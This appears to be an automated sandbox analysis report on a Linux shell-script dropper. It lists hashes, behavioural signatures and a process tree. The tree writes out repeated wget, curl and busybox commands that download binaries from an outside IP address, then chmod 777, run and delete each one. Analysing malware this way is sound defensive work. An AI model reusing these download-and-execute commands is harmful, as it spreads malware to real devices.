Analysis
-
max time kernel
22s -
max time network
24s -
platform
debian-9_armhf -
resource
debian9-armhf-20240729-en -
resource tags
arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
18/10/2024, 01:51
Static task
static1
Behavioral task
behavioral1
Sample
618c5d3c5bb9901a9550e576340502f7f2f23506dbb8fa46e8692a8f53d3152c.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
618c5d3c5bb9901a9550e576340502f7f2f23506dbb8fa46e8692a8f53d3152c.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
618c5d3c5bb9901a9550e576340502f7f2f23506dbb8fa46e8692a8f53d3152c.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
618c5d3c5bb9901a9550e576340502f7f2f23506dbb8fa46e8692a8f53d3152c.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
618c5d3c5bb9901a9550e576340502f7f2f23506dbb8fa46e8692a8f53d3152c.sh
-
Size
10KB
-
MD5
e467b8cbbdd28cf09dcbb9e7b6e6ef11
-
SHA1
d6c5601ff1d0e611c3c890c145fae6c31f4c6e2a
-
SHA256
618c5d3c5bb9901a9550e576340502f7f2f23506dbb8fa46e8692a8f53d3152c
-
SHA512
0035d8533980a3d2046c0062d11bb3ae860dc14a1fefcc5ece520138629b221762d851d6ede5a30bf323ed50feace6b60517a5d9379e324138611d5927cc615c
-
SSDEEP
192:GuSqVCOCaa2Tkychn/4DQSqVCO2n/4Qp/:GvabTkychn/4zn/4Qp/
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 11 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 689 chmod 726 chmod 801 chmod 819 chmod 825 chmod 831 chmod 700 chmod 772 chmod 795 chmod 807 chmod 813 chmod -
Executes dropped EXE 11 IoCs
ioc pid Process /tmp/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N 690 wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N /tmp/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3 701 yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3 /tmp/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU 727 v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU /tmp/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O 773 JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O /tmp/ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ 796 ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ /tmp/OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4 802 OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4 /tmp/dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP 808 dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP /tmp/4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U 814 4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U /tmp/M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx 820 M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx /tmp/UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ 826 UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ /tmp/NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP 832 NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP -
Checks CPU configuration 1 TTPs 11 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 11 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3 curl File opened for modification /tmp/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU curl File opened for modification /tmp/OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4 curl File opened for modification /tmp/UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ curl File opened for modification /tmp/NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP curl File opened for modification /tmp/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N curl File opened for modification /tmp/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O curl File opened for modification /tmp/ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ curl File opened for modification /tmp/dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP curl File opened for modification /tmp/4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U curl File opened for modification /tmp/M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx curl
Processes
-
/tmp/618c5d3c5bb9901a9550e576340502f7f2f23506dbb8fa46e8692a8f53d3152c.sh/tmp/618c5d3c5bb9901a9550e576340502f7f2f23506dbb8fa46e8692a8f53d3152c.sh1⤵PID:660
-
/bin/rm/bin/rm bins.sh2⤵PID:662
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N2⤵PID:668
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:677
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N2⤵PID:686
-
-
/bin/chmodchmod 777 wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N2⤵
- File and Directory Permissions Modification
PID:689
-
-
/tmp/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N./wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N2⤵
- Executes dropped EXE
PID:690
-
-
/bin/rmrm wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N2⤵PID:692
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu32⤵PID:694
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu32⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:697
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu32⤵PID:699
-
-
/bin/chmodchmod 777 yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu32⤵
- File and Directory Permissions Modification
PID:700
-
-
/tmp/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3./yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu32⤵
- Executes dropped EXE
PID:701
-
-
/bin/rmrm yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu32⤵PID:702
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU2⤵PID:703
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:713
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU2⤵PID:718
-
-
/bin/chmodchmod 777 v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU2⤵
- File and Directory Permissions Modification
PID:726
-
-
/tmp/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU./v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU2⤵
- Executes dropped EXE
PID:727
-
-
/bin/rmrm v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU2⤵PID:728
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O2⤵PID:729
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:738
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O2⤵PID:756
-
-
/bin/chmodchmod 777 JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O2⤵
- File and Directory Permissions Modification
PID:772
-
-
/tmp/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O./JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O2⤵
- Executes dropped EXE
PID:773
-
-
/bin/rmrm JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O2⤵PID:775
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ2⤵PID:776
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:779
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ2⤵PID:794
-
-
/bin/chmodchmod 777 ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ2⤵
- File and Directory Permissions Modification
PID:795
-
-
/tmp/ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ./ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ2⤵
- Executes dropped EXE
PID:796
-
-
/bin/rmrm ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ2⤵PID:797
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF42⤵PID:798
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:799
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF42⤵PID:800
-
-
/bin/chmodchmod 777 OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF42⤵
- File and Directory Permissions Modification
PID:801
-
-
/tmp/OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4./OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF42⤵
- Executes dropped EXE
PID:802
-
-
/bin/rmrm OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF42⤵PID:803
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP2⤵PID:804
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:805
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP2⤵PID:806
-
-
/bin/chmodchmod 777 dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP2⤵
- File and Directory Permissions Modification
PID:807
-
-
/tmp/dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP./dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP2⤵
- Executes dropped EXE
PID:808
-
-
/bin/rmrm dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP2⤵PID:809
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U2⤵PID:810
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:811
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U2⤵PID:812
-
-
/bin/chmodchmod 777 4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U2⤵
- File and Directory Permissions Modification
PID:813
-
-
/tmp/4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U./4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U2⤵
- Executes dropped EXE
PID:814
-
-
/bin/rmrm 4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U2⤵PID:815
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx2⤵PID:816
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:817
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx2⤵PID:818
-
-
/bin/chmodchmod 777 M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx2⤵
- File and Directory Permissions Modification
PID:819
-
-
/tmp/M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx./M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx2⤵
- Executes dropped EXE
PID:820
-
-
/bin/rmrm M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx2⤵PID:821
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ2⤵PID:822
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:823
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ2⤵PID:824
-
-
/bin/chmodchmod 777 UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ2⤵
- File and Directory Permissions Modification
PID:825
-
-
/tmp/UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ./UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ2⤵
- Executes dropped EXE
PID:826
-
-
/bin/rmrm UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ2⤵PID:827
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP2⤵PID:828
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:829
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP2⤵PID:830
-
-
/bin/chmodchmod 777 NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP2⤵
- File and Directory Permissions Modification
PID:831
-
-
/tmp/NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP./NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP2⤵
- Executes dropped EXE
PID:832
-
-
/bin/rmrm NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP2⤵PID:833
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf2⤵PID:834
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97